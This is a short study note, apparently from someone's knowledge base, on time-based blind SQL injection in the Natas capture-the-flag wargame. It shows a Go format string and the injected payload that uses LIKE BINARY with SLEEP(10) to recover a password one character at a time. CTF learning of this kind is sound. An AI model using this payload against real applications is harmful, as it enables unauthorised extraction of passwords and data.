alipzsh/knowledge-base/SQLi Blind Time Delays.md

 to get the included characters in the password: in code: ``username := fmt.Sprintf(`natas18" AND IF(password LIKE BINARY "%%%c%%", SLEEP(10), 1)#`, c)``

-% is used for formatting in Go, you need to escape it, which results in the final query having %c%.
-`%c%` in LIKE clause: wild card in SQL, meaning "any sequence of characters".

 so it will be like this before sent to the server:
 `natas18" AND IF((password LIKE BINARY "%S%"),SLEEP(10),"1")#`